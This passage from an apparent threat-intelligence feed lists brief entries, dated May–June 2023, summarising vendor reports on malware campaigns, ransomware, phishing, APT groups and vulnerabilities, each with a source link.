Date of Scan:: 2023-06-17

Impact:: LOW

Summary:: Researchers from Stairwell have observed that the Chinese threat group 'ChamelGang' infecting Linux devices with a previously unknown implant named 'ChamelDoH,' allowing DNS-over-HTTPS communications with attackers' servers.

Source: https://stairwell.com/news/chamelgang-and-chameldoh-a-dns-over-https-implant/

Intel Source:: Checkmarx

Intel Name:: Supply_Chain_Attackers_Exploiting_New_Technique

Date of Scan:: 2023-06-17

Impact:: LOW

Summary:: Checkmarx researchers have identified a new attack technique for hijacking S3 buckets by Supply Chain Attackers.

Source: https://checkmarx.com/blog/hijacking-s3-buckets-new-attack-technique-exploited-in-the-wild-by-supply-chain-attackers/

Intel Source:: ASEC

Intel Name:: Lazarus_group_exploiting_Korean_finance_security_solution_vulnerability

Date of Scan:: 2023-06-16

Impact:: LOW

Summary:: The ASEC team have observed Lazarus threat group exploiting new vulnerabilities in VestCert and TCO!Stream. Update software promptly to mitigate risks. Stay informed, strengthen security measures against advanced threats.

Source: https://asec.ahnlab.com/en/54195/

Intel Source:: HP Wolf Security

Intel Name:: A_New_ChromeLoader_Campaign_Named_Shampoo

Date of Scan:: 2023-06-16

Impact:: MEDIUM

Summary:: HP Wolf Security detects new malware campaign "Shampoo" utilizing malicious ChromeLoader extension. It steals sensitive information, injects ads, and poses challenges for removal.

Source: https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/

Intel Source:: Netskope

Intel Name:: Netskope_DL_based_Inline_Phishing_Detection

Date of Scan:: 2023-06-16

Impact:: LOW

Summary:: Netskope Threat Labs have observed ChatGPT facilitates natural language processing and communication, while Netskope's Inline Phishing Detection focuses on identifying and blocking phishing attacks in real-time.

Source: https://www.netskope.com/blog/heres-what-chatgpt-and-netskopes-inline-phishing-detection-have-in-common

Intel Source:: Trellix

Intel Name:: Phishing_Attacks_Using_HTML_Attachments

Date of Scan:: 2023-06-16

Impact:: LOW

Summary:: Trellix researchers have identified a phishing attacks using HTML attachments are increasing rapidly, targeting global industries with obfuscation techniques and evasion methods, requiring heightened vigilance and strong email security measures.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/the-anatomy-of-html-attachment-phishing.html

Intel Source:: Microsoft

Intel Name:: Introducing_Cadet_Blizzard_as_a_Significant_New_Russian_Threat_Actor

Date of Scan:: 2023-06-15

Impact:: MEDIUM

Summary:: Microsoft researchers have updated details about techniques of a threat actor formerly tracked as DEV-0586—a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard.

Source: https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Intel Source:: TrendMicro

Intel Name:: A_Look_into_Earth_Preta_Hidden_Working

Date of Scan:: 2023-06-14

Impact:: LOW

Summary:: TrendMicro researchers have discussed the more technical details of the most recent tools, techniques, and procedures (TTPs) leveraged by the Earth Preta APT group.

Source: https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html

Intel Source:: Sygnia

Intel Name:: Analyzing_a_global_adversary_in_the_middle_campaign

Date of Scan:: 2023-06-14

Impact:: LOW

Summary:: In the begining of this year, Sygnia’s IR team was investigating and analyzing about a Business Email Compromise (BEC) attack against one of its clients.The threat actor gained initial access to one of the victim employees' accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After getting the access, the threat actor exfiltrated data from the compromised account and used his access to spread phishing attacks to other victim’s employees along with several external targeted organizations.

Source: https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit

Intel Source:: Trellix

Intel Name:: New_Golang_Based_Skuld_Malware

Date of Scan:: 2023-06-14

Impact:: MEDIUM

Summary:: Trellix researchers have identified a new Golang-based information stealer called Skuld that has compromised Windows systems across Europe, Southeast Asia, and the US.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/skuld-the-infostealer-that-speaks-golang.html

Intel Source:: Netscope

Intel Name:: The_risks_of_zip_and_mov_domains

Date of Scan:: 2023-06-14

Impact:: LOW

Summary:: Sometime ago Google discovered and shared eight new top level domains. Two of them (.zip and .mov) have been a concern because they are similar to well known file extensions. Both .zip and .mov TLD are not new, as they have been available since 2014. The main threat was that anyone now can own a .zip or .mov domain and be taken advantage for social engineering at a cheap price. The threat with the .zip and .mov domains is that attackers will be able to craft URLs that appear to be delivering ZIP and MOV files, but instead will redirect victims to malicious websites.

Source: https://www.netskope.com/blog/zip-and-mov-top-level-domain-abuse-one-month-after-being-made-public

Intel Source:: Dr.WEB

Intel Name:: Pirated_Windows_10_ISOs_Install_Clipper_Malware

Date of Scan:: 2023-06-14

Impact:: MEDIUM

Summary:: Dr.WEB researchers have identified that hackers are distributing Windows 10 using torrents that hide cryptocurrency hijackers in the EFI (Extensible Firmware Interface) partition to evade detection.

Source: https://news.drweb.com/show/?i=14712&lng=en

Intel Source:: Cyble

Intel Name:: WannaCry_Imitator_targets_Russian_Gaming_Community

Date of Scan:: 2023-06-14

Impact:: MEDIUM

Summary:: Cyble reserachers observed recently some phishing campaigns that use gaming sites as a distribution channel for various malware families. They discovered a phishing campaign targeting Russian-speaking gamers targeting to distribute ransomware. The fake website lets install a file that contains a legitimate game installer and ransomware. The ransomware has used the name “WannaCry 3.0” and utilizes the “wncry” file extension for encrypting files, although it is not a orogonal variant of the WannaCry ransomware. This ransomware is a modified version of an open-source Ransomware “Crypter”, developed for Windows and written purely in Python.

Source: https://blog.cyble.com/2023/06/13/threat-actor-targets-russian-gaming-community-with-wannacry-imitator/

Intel Source:: Securelist

Intel Name:: Multistage_DoubleFinger_loads_GreetingGhoul_stealer

Date of Scan:: 2023-06-13

Impact:: LOW

Summary:: Securilist shared their analyses about the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger’s loader stages.

Source: https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Threats_analyses_May_28_June_3_20

Date of Scan:: 2023-06-13

Impact:: LOW

Summary:: The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from May 28th to June 3rd, 2023 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/54163/

Intel Source:: Sophos

Intel Name:: Diving_Deep_into_Pikabot_Cyber_Threat

Date of Scan:: 2023-06-13

Impact:: LOW

Summary:: Sophos researchers have identified Pikabot malware, Pikabot is a modular malware trojan acting as a backdoor, allowing unauthorized remote access and executing diverse commands received from a command-and-control server. It has the potential for multi-staged attacks

Source: https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/

Intel Source:: ISC. SANS

Intel Name:: Undetected_PowerShell_Backdoor

Date of Scan:: 2023-06-12

Impact:: LOW

Summary:: ISC. SANS researcher Xavier Mertens found a script that scored 0/59 on VT. He provided the details on his findings on it. The file was found with the name « Microsoft.PowerShell_profile.ps1 ». The attacker decided to select that name because this is a familiar name used by Microsoft to manage PowerShell profiles.

Source: https://isc.sans.edu/diary/Undetected%20PowerShell%20Backdoor%20Disguised%20as%20a%20Profile%20File/29930

Intel Source:: Securelist

Intel Name:: Satacom_malware_steals_cryptocurrency

Date of Scan:: 2023-06-12

Impact:: LOW

Summary:: Securilist shared retheir analyses about recent malware distribution campaign related to the Satacom downloader, also known as LegionLoader, is a renewed malware family that has been around since 2019. The main goal of this malware that is dropped by the Satacom downloader is to steal BTC from the victim’s account by performing web injections into targeted cryptocurrency websites. The malware tries to install an extension for Chromium-based web browsers, which later communicates with its C2 server, whose address is stored in the BTC transaction data.

Source: https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/

Intel Source:: DFIR Report

Intel Name:: Truebot_Using_Cobalt_Strike_and_FlawedGrace

Date of Scan:: 2023-06-12

Impact:: LOW

Summary:: The DFIR Report researchers have identified that Truebot is delivering through a Traffic Distribution System. This campaign, observed in May 2023, leveraged email for the initial delivery mechanism. After clicking through the link in an email, the victim would be redirected through a series of URLs before being presented with a file download at the final landing page.

Source: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/

Intel Source:: Elastic

Intel Name:: Hackers_Targeting_Vietnamese_Public_Companies_With_SPECTRALVIPER_Backdoor

Date of Scan:: 2023-06-12

Impact:: LOW

Summary:: Researchers from Elastic have identified an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER which is targeting Vietnamese public companies. It is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities.

Source: https://www.elastic.co/security-labs/elastic-charms-spectralviper

Intel Source:: Cyble

Intel Name:: Darkrace_Ransomware_Resembles_LockBit_Ransomware

Date of Scan:: 2023-06-12

Impact:: LOW

Summary:: Cyble researchers have discovered a new ransomware named Darkrace which has similarities with Lockbit Ransomware. It is specifically targeting Windows operating systems and exhibits several similarities to the LockBit ransomware, including the deployment of batch files to terminate processes, the dropping of file icons, and the utilization of random encryption extensions.

Source: https://blog.cyble.com/2023/06/08/unmasking-the-darkrace-ransomware-gang/

Intel Source:: ISC.SANS

Intel Name:: Activity_of_DShield_Honeypot

Date of Scan:: 2023-06-12

Impact:: LOW

Summary:: Researchers from SANS have reviewed the DShield honeypot stored the previous month. Also interesting is how the activity varies from week to week.

Source: https://isc.sans.edu/diary/DShield+Honeypot+Activity+for+May+2023/29932/

Intel Source:: Cyble

Intel Name:: Malicious_PyPI_Packages

Date of Scan:: 2023-06-12

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs analysts have been actively tracking malicious python packages and recently observed different infostealersr, one is dubbed as KEKW that was spreading through multiple malicious python packages, another one was the Creal Stealer, which is an open-source stealer that has been extensively utilized by threat actors. There was no evidence of it being propagated through Python packages. Cyble researches discovered several Python packages that were found to distribute the Creal Stealer. Another ones, The TIKCOCK GRABBER, The Hazard Token Grabber, the W4SP stealer, are type of Information Stealer malwares that focuse on extracting sensitive information from victims’ systems. Cyble's analysis revealed that InfoStealers, a specific type of malware, was predominantly propagated through malicious Python packages. The presence of readily accessible code for information Stealers on platforms like GitHub has empowered multiple threat actors to leverage this particular strain of malware in their campaigns.

Source: https://blog.cyble.com/2023/06/09/over-45-thousand-users-fell-victim-to-malicious-pypi-packages/

Intel Source:: Obsidian

Intel Name:: A_SaaS_ransomware_attack_against_a_Sharepoint_365

Date of Scan:: 2023-06-12

Impact:: LOW

Summary:: Obsidian’s Threat Research team has observed a SaaS ransomware attack against a company’s Sharepoint Online (Microsoft 365) without using a compromised endpoint. Our team and product were leveraged post-compromise to determine the finer details of the attack.

Source: https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/

Intel Source:: Group-IB

Intel Name:: Dark_Pink_APT_Group_Return_With_5_Victims_in_New_Countries

Date of Scan:: 2023-06-09

Impact:: LOW

Summary:: Group-IB researchers have identified new tools, exfiltration mechanisms, and victims in new industries, in countries that Dark Pink has never targeted before. It has continued to attack government, military, and non-profit organizations in the Asia-Pacific expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium.

Source: https://www.group-ib.com/blog/dark-pink-episode-2/

Intel Source:: Checkpoint

Intel Name:: North_African_Espionage_Attacks_Using_Stealth_Soldier_Backdoors

Date of Scan:: 2023-06-09

Impact:: MEDIUM

Summary:: Check Point researchers have identified an ongoing operation against targets in North Africa involving a previously undisclosed multi-stage backdoor called Stealth Soldier. The malware Command and Control network is part of a larger set of infrastructure, used at least in part for spear-phishing campaigns against government entities.

Source: https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/

Intel Source:: JPCERT

Intel Name:: GobRAT_malware_targeting_Linux_routers

Date of Scan:: 2023-06-09

Impact:: MEDIUM

Summary:: JPCERT/CC has shared about attacks that infected routers in Japan with malware around February 2023. Their analyses blog gives the details of the attack confirmed by JPCERT/CC and GobRAT malware, which was used in the attack. Based on JPCERT analyses, the attack vector and target initially was a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT

Source: https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

Intel Source:: Cofense

Intel Name:: Caffeine_phishing_domains_and_patterns_still_active_despite_store_closure

Date of Scan:: 2023-06-09

Impact:: LOW

Summary:: Cofense researchers have observed an ongoing and evolving campaign of credential phishing activity has been detected, specifically targeting Microsoft Office 365 credentials. This campaign involves the distribution of fraudulent emails that aim to deceive recipients and trick them into divulging their Office 365 login credentials.

Source: https://cofense.com/blog/caffeine-phishing-service-domains-patterns-still-heavily-used-after-store-seemingly-defunct/

Intel Source:: Blackberry

Intel Name:: RomCom_Group_Targeting_Politicians_in_Ukraine_and_US_Based_Healthcare

Date of Scan:: 2023-06-09

Impact:: MEDIUM

Summary:: Blackberry researchers have observed RomCom targeting politicians in Ukraine who are working closely with Western countries, and a U.S.-based healthcare company providing humanitarian aid to the refugees fleeing from Ukraine and receiving medical assistance in the U.S.

Source: https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine

Intel Source:: Welivesecurity

Intel Name:: The_Details_About_Asylum_Ambuscade_Cybercrime_Group

Date of Scan:: 2023-06-09

Impact:: LOW

Summary:: Researchers from Welivesecurity have analyzed the Asylum Ambuscade cybercrime group that has been performing cyberespionage operations on the side and provided details about the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.

Source: https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/

Intel Source:: Barracuda

Intel Name:: Zero_Day_Flaw_in_Barracuda_Email_Security_Gateway_Appliances

Date of Scan:: 2023-06-08

Impact:: MEDIUM

Summary:: Researchers from Barracuda have urged their customers who were impacted by a recently disclosed zero-day flaw in its Email Security Gateway (ESG) appliances to immediately replace them.

Source: https://www.barracuda.com/company/legal/esg-vulnerability

Intel Source:: Cofense

Intel Name:: The_Return_of_Vacation_Request_Phishing_Emails

Date of Scan:: 2023-06-08

Impact:: LOW

Summary:: Cofense researchers have observed a phishing campaign where the threat actor sends an email to a user that claims to be from the ‘HR Department’ and provided the user with a link to submit their annual leave requests.

Source: https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/

Intel Source:: ASEC

Intel Name:: Hackers_Distributing_Malicious_Job_Application_Letters

Date of Scan:: 2023-06-08

Impact:: LOW

Summary:: ASEC researchers have identified that malware disguised as a job application letter is continuously being distributed. This malware is equipped with a feature that checks for the presence of various antivirus processes.

Source: https://asec.ahnlab.com/en/53744/

Intel Source:: TrendMicro

Intel Name:: The_Examination_of_TargetCompany_Ransomware

Date of Scan:: 2023-06-07

Impact:: LOW

Summary:: TrendMicro researchers have identified that threat actors behind TargetCompany ransomware clarified that each major update of the ransomware entailed a change in the encryption algorithm and different decryptor characteristics. These are accompanied by a change in file name extensions, hence the evolution of names by which the ransomware group is known.

Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-targetcompany

Intel Source:: IBM Security Intelligence

Intel Name:: ITG10_Group_Targeting_South_Korean_Entities

Date of Scan:: 2023-06-07

Impact:: LOW

Summary:: IBM Security researchers have uncovered documents that are most likely part of a phishing campaign mimicking credible senders, orchestrated by a group X-Force refers to as ITG10, and aimed at delivering RokRAT malware.

Source: https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/

Intel Source:: Cyble

Intel Name:: Hackers_Targeting_Korean_Users_via_Malicious_Document_Files

Date of Scan:: 2023-06-07

Impact:: LOW

Summary:: Cyble researchers have discovered an ongoing campaign associated with the notorious ransomware group LockBit. It has once again embraced the approach of disseminating malware through malicious document files targeting Korean individuals. Notably, the group utilized the same template injection techniques to deliver their payload.

Source: https://blog.cyble.com/2023/06/06/lockbit-ransomware-2-0-resurfaces/

Intel Source:: Recorded Future

Intel Name:: North_Korean_TAG71_Group_Spoofs_Asian_and_US_Financial_Institutions

Date of Scan:: 2023-06-07

Impact:: MEDIUM

Summary:: Recorded Future researchers have discovered malicious cyber threat activity spoofing several financial institutions and venture capital firms in Japan, Vietnam, and the United States. They refer to the group behind this activity as Threat Activity Group 71 (TAG-71). Also, identified 74 domains resolving to 5 IP addresses, as well as 6 malicious files, in the most recent cluster of activity from September 2022 to March 2023.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf

Intel Source:: Lumen

Intel Name:: Qakbot_Retool_Reinfect_Recycle

Date of Scan:: 2023-06-07

Impact:: LOW

Summary:: Lumen researchers observed recent Qakbot’s campaigns to see insights of their network structure, and gained key insights into the methods that support Qakbot’s reputation as an evasive and tenacious threat.

Source: https://blog.lumen.com/qakbot-retool-reinfect-recycle/?utm_source=substack&utm_medium=email

Intel Source:: Splunk

Intel Name:: Detection_and_Analysis_of_RedLine_Stealer

Date of Scan:: 2023-06-06

Impact:: LOW

Summary:: RedLine Stealer is a malware strain designed to steal sensitive information from compromised systems. It is typically distributed through phishing emails, social engineering tactics, and malicious URL links.

Source: https://www.splunk.com/en_us/blog/security/do-not-cross-the-redline-stealer-detections-and-analysis.html

Intel Source:: Akamai

Intel Name:: Hackers_Take_Over_Legitimate_Sites_to_Host_Credit_Card_Stealer_Scripts

Date of Scan:: 2023-06-06

Impact:: LOW

Summary:: Akamai researchers have observed a new Magecart credit card stealing campaign hijacks legitimate sites to act as "makeshift" command and control (C2) servers to inject and hide the skimmers on targeted eCommerce sites.

Source: https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains

Intel Source:: Sentinelone

Intel Name:: New_Social_Engineering_Campaign_Aims_to_Steal_Credentials_and_Gather_Strategic_Intelligence

Date of Scan:: 2023-06-06

Impact:: MEDIUM

Summary:: SentinelLabs researchers have tracked a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.

Source: https://www.sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/

Intel Source:: Huntress

Intel Name:: MOVEit_Transfer_Critical_Vulnerability

Date of Scan:: 2023-06-06

Impact:: LOW

Summary:: Researchers from Hunteers have investigated the exploitation of critical MOVEit transfer vulnerability CVE-2023-34362.

Source: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response

Intel Source:: CERT-UA

Intel Name:: Cyberespionage_Against_Ukrainian_State_Bodies_and_Media

Date of Scan:: 2023-06-06

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified that files (.HTA, .EXE, .RAR, .LNK) are distributed by unknown persons using e-mail and instant messengers, the launch of which leads to damage to the victim's computer by the LONEPAGE malicious program.

Source: https://cert.gov.ua/article/4818341

Intel Source:: Eclecticiq

Intel Name:: Chinese_Hackers_Using_Modified_Cobalt_Strike_Variant_to_Attack_Taiwanese_Critical_Infrastructure

Date of Scan:: 2023-06-05

Impact:: LOW

Summary:: EclecticIQ researchers have identified a malicious web server very likely operated by a Chinese threat actor used to target Taiwanese government entities, including critical infrastructure

Source: https://blog.eclecticiq.com/chinese-threat-actor-used-modified-cobalt-strike-variant-to-attack-taiwanese-critical-infrastructure

Intel Source:: Esentire

Intel Name:: Return_of_GuLoader_VBScript_Variant_with_PowerShell_Updates

Date of Scan:: 2023-06-05

Impact:: LOW

Summary:: GuLoader is a sophisticated malware loader which has heavily abused tax-themed lures. TRU reported on ongoing GuLoader activity using tax-themed lures and decoy files TRU identified an updated VBScript GuLoader variant across multiple customers.

Source: https://www.esentire.com/blog/guloader-vbscript-variant-returns-with-powershell-updates

Intel Source:: Perception Point

Intel Name:: Diving_Deep_into_Red_Deer

Date of Scan:: 2023-06-05

Impact:: LOW

Summary:: Researchers from Perception Point have deeply analyzed a malware campaign crafted specifically for the Israeli audience called Red Deer.

Source: https://perception-point.io/blog/operation-red-deer/

Intel Source:: Menlo Security

Intel Name:: Analysis_of_XeGroups_Attack_Techniques_Detected

Date of Scan:: 2023-06-05

Impact:: LOW

Summary:: XeGroup’s tactics, techniques, and procedures have been detailed in a report by Volexity, which suggests that the group may be associated with other cybercriminal organizations and may have links to state-sponsored hacking groups.

Source: https://www.menlosecurity.com/blog/not-your-average-joe-an-analysis-of-the-xegroups-attack-techniques/

Intel Source:: VMware

Intel Name:: Detection_of_Carbon_Black_TrueBot_Malware

Date of Scan:: 2023-06-05

Impact:: LOW

Summary:: VMware’s Carbon Black Managed Detection and Response (MDR) team began seeing a surge of TrueBot activity. TrueBot is under active development by Silence, with recent versions using a Netwrix vulnerability for delivery.

Source: https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html

Intel Source:: Checkpoint

Intel Name:: The_Camaro_Dragon_Strikes_with_a_New_TinyNote_Backdoor

Date of Scan:: 2023-06-03

Impact:: LOW

Summary:: Checkpoint researchers have observed that a Chinese nation-stage group known as Camaro Dragon has been linked to yet another backdoor that's designed to meet its intelligence-gathering goals.

Source: https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/

Intel Source:: Symantec

Intel Name:: Lancefly_APT_Targets_Governments_Aviation_and_Organizations_with_Custom_Backdoors

Date of Scan:: 2023-06-03

Impact:: LOW

Summary:: Researchers from Symantec have identified that Lancefly APT goup has been using custom backdoors for several years to target organizations in South and Southeast Asia.

Source: https://symantec-enterprise-blogs.security.com/blogs/japanese/lancefly-aptkurufukasutamuhatsukutoatezhengfuyahangkongbumennatonozuzhiwobiaodeni

Intel Source:: Talos

Intel Name:: New_unidentified_botnet_campaign_Horabot

Date of Scan:: 2023-06-02

Impact:: LOW

Summary:: Cisco Talos researchers have identified that unidentified botnet program Talos is calling “Horabot,” which delivers a known banking trojan and spam tool onto victim machines in a campaign.

Source: https://blog.talosintelligence.com/new-horabot-targets-americas/

Intel Source:: ReversingLabs

Intel Name:: Who_and_What_Threatens_the_World_Column_exe_malware

Date of Scan:: 2023-06-02

Impact:: LOW

Summary:: The ReversingLabs research team has identified a novel attack on PyPI using compiled Python code to evade detection possibly the first attack to take advantage of PYC file direct execution.

Source: https://www.reversinglabs.com/blog/when-python-bytecode-bites-back-who-checks-the-contents-of-compiled-python-files

Intel Source:: Securelist

Intel Name:: Previously_unknown_malware_attacked_IOS_devices

Date of Scan:: 2023-06-02

Impact:: LOW

Summary:: During of monitoring the network traffic of Securelist corporate Wi-Fi network, the researchers observed suspicious activity that originated from several iOS-based phones. Beucase it was impossible to inspect modern iOS devices from the inside, the researchers created offline backups of the devices in question, inspected them using the Mobile Verification Toolkit’s mvt-ios and discovered traces of compromise. The called this campaign “Operation Triangulation”.

Source: https://securelist.com/operation-triangulation/109842/

Intel Source:: Cyble

Intel Name:: SharpPanda_APT_Campaign_Expands

Date of Scan:: 2023-06-02

Impact:: LOW

Summary:: Cyble reserachers observed an ongoing campaign by SharpPanda APT. Before, this APT group has a history of targeting government officials, particularly in Southeast Asian countries. This latest campaign specifically targets high-level government officials from G20 nations.

Source: https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/

Intel Source:: Blackberry

Intel Name:: Operation_CMDStealer

Date of Scan:: 2023-06-02

Impact:: LOW

Summary:: BlackBerry researchers have identified an unknown financially motivated threat actor, very likely from Brazil, is targeting Spanish- and Portuguese-speaking victims, with the goal of stealing online banking access. The victims are primarily in Portugal, Mexico, and Peru. This threat actor employs tactics such as LOLBaS (Living Off the Land Binaries and Scripts), along with CMD-based scripts to carry out its malicious activities.

Source: https://blogs.blackberry.com/en/2023/05/cmdstealer-targets-portugal-peru-and-mexico

Intel Source:: Sentinelone

Intel Name:: Operation_Magalenha

Date of Scan:: 2023-06-02

Impact:: LOW

Summary:: SentinelLabs has been tracking a campaign over the rst quarter of 2023 targeting users of Portuguese nancial institutions, including government, government-backed, and private institutions.

Source: https://de.sentinelone.com/wp-content/uploads/pdf-gen/1684978893/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii.pdf

Intel Source:: AT&T

Intel Name:: A_new_Quasar_variant_SeroXen_RAT

Date of Scan:: 2023-06-01

Impact:: LOW

Summary:: AT&T Alien Labs researchers reviewed recent malicious samples, a new Quasar variant which was observed by Alien Labs in the wild -SeroXen. This new RAT is a modified branch of the open-source version, adding some modifications features to the original RAT.

Source: https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale

Intel Source:: TrendMicro

Intel Name:: The_connections_between_BlackSuit_and_Royal_ransomware

Date of Scan:: 2023-06-01

Impact:: LOW

Summary:: Researchers from Trendmicro analyzed BlackSuit ransomware and how it compares to Royal Ransomware. Several researchers on Twitter discovered a new ransomware family called BlackSuit that targeted both Windows and Linux users. Some Twitter posts also mentioned connections between BlackSuit and Royal, which triggered Trendmicro reserchers interest. Trendmicro researchers shared in their blog the analyses of a Windows 32-bit sample of the ransomware from Twitter.

Source: https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html

Intel Source:: ISC. SANS

Intel Name:: The_attacks_against_Apache_NiFi

Date of Scan:: 2023-06-01

Impact:: LOW

Summary:: On May 19th, Johannes Ullrich, ISC SANS analyst noted a rapid increase in requests like: Attacks Against Apache NiFi. Apache NiFi describes itself as “an easy-to-use, powerful, and reliable system to process and distribute data. For sure one actor is actively scanning the Internet for unprotected instances of Apache NiFi. That threat actor will add processors in Apache NiFi to either istall a crypto coin miner and then to perform lateral movement by searching the server for SSH credentials.

Source: https://isc.sans.edu/diary/rss/29900

Intel Source:: ASEC

Intel Name:: Distribution_of_Malware_Disguised_as_Hancom_Office_Document_File_Detected

Date of Scan:: 2023-06-01

Impact:: LOW

Summary:: AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware disguised as Hancom Office document files. The malware that is being distributed is named “Who and What Threatens the World (Column).exe” and is designed to deceive users by using an icon that is similar to that of Hancom Office.

Source: https://asec.ahnlab.com/en/53377/

Intel Source:: Cleafy

Intel Name:: The_deeper_techniques_of_sLoad_Ramnit_and_drIBAN

Date of Scan:: 2023-06-01

Impact:: LOW

Summary:: Cleafy analysts shared in their blog the deeper techniques that that made them connect sLoad, Ramnit, and drIBAN malwares. The analysts provided some Ramnit characteristics and the techniques used to perform the MiTB attack and deliver its injection kit.

Source: https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter-2

Intel Source:: Eclypsium

Intel Name:: Gigabyte_App_Center_Backdoor_risk

Date of Scan:: 2023-06-01

Impact:: LOW

Summary:: Recently, the Eclypsium platform observed some suspicious backdoor behavior inside of Gigabyte systems. Their detectors detected new previously-unknown supply chain threats, where legitimate third-party technology products or updates have been compromised. The Eclypsium analysis discovered that firmware in Gigabyte systems is dropping and executing a Windows native executable file during the system startup process, and this executable one then downloads and executes additional payloads insecurely. It uses the same techniques as other OEM backdoor-like features like Computrace backdoor (a.k.a. LoJack DoubleAgent) abused by threat actors and even firmware implants such as Sednit LoJax, MosaicRegressor, Vector-EDK.

Source: https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/

Intel Source:: WeliveSecurity

Intel Name:: AceCryptor_cruptor_operation

Date of Scan:: 2023-05-31

Impact:: LOW

Summary:: ESET researchers shared details about a widespreaded cryptor, operating as a cryptor-as-a-service used by tens of malware families.

Source: https://www.welivesecurity.com/2023/05/25/shedding-light-acecryptor-operation/

Intel Source:: Intezer

Intel Name:: CryptoClippy_actively_expanding_its_capabilities

Date of Scan:: 2023-05-31

Impact:: LOW

Summary:: Intezer analysts shared the details of the indication that the threat actors behind CryptoClippy are actively expanding its capabilities, now targeting a broader range of payment services commonly used in Brazil.

Source: https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/

Intel Source:: ISC. SANS

Intel Name:: DocuSign_email_opens_to_script_based_infection

Date of Scan:: 2023-05-31

Impact:: LOW

Summary:: SomeTwitter user @0xToxin has discovered malicious emails imitating DocuSign with HTML attachments recently.

Source: https://isc.sans.edu/diary/rss/29888

Intel Source:: Inky

Intel Name:: ChatGPT_safisticated_Phishing_Scam

Date of Scan:: 2023-05-31

Impact:: LOW

Summary:: The Inky reserachers observed that cybercriminals have begun impersonating the brand in a sophisticated personalized phishing campaign ChatGPT whose impersonation fuels a Clever Phishing Scam.

Source: https://www.inky.com/en/blog/fresh-phish-chatgpt-impersonation-fuels-a-clever-phishing-scam

Intel Source:: NSA / Secureworks

Intel Name:: Chinese_APT_Group_BRONZE_SILHOUETTE_Targeting_US_Government_and_Defense_Organizations

Date of Scan:: 2023-05-30

Impact:: MEDIUM

Summary:: SecureWorks researchers have discovered a cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.

Source: https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

Intel Source:: Cyble

Intel Name:: Obsidian_ORB_Ransomware_Demanding_Payment_With_Gift_Cards

Date of Scan:: 2023-05-30

Impact:: LOW

Summary:: Cyble researchers have come across a new and unique ransomware strain named Obsidian ORB. Extensive analysis has revealed compelling evidence that suggests a significant correlation between Obsidian ORB Ransomware and the underlying source code of the notorious Chaos ransomware.

Source: https://blog.cyble.com/2023/05/25/obsidian-orb-ransomware-demands-gift-cards-as-payment/

Intel Source:: Cyble

Intel Name:: The_Invicta_Stealer_Spreading

Date of Scan:: 2023-05-30

Impact:: LOW

Summary:: Cyble researcher Lab team discovered a new stealer called Invicta Stealer. The developer who is in charge of this malware is heavy involved on social media platforms, utilizing them to promote their information stealer and its lethal capabilities.

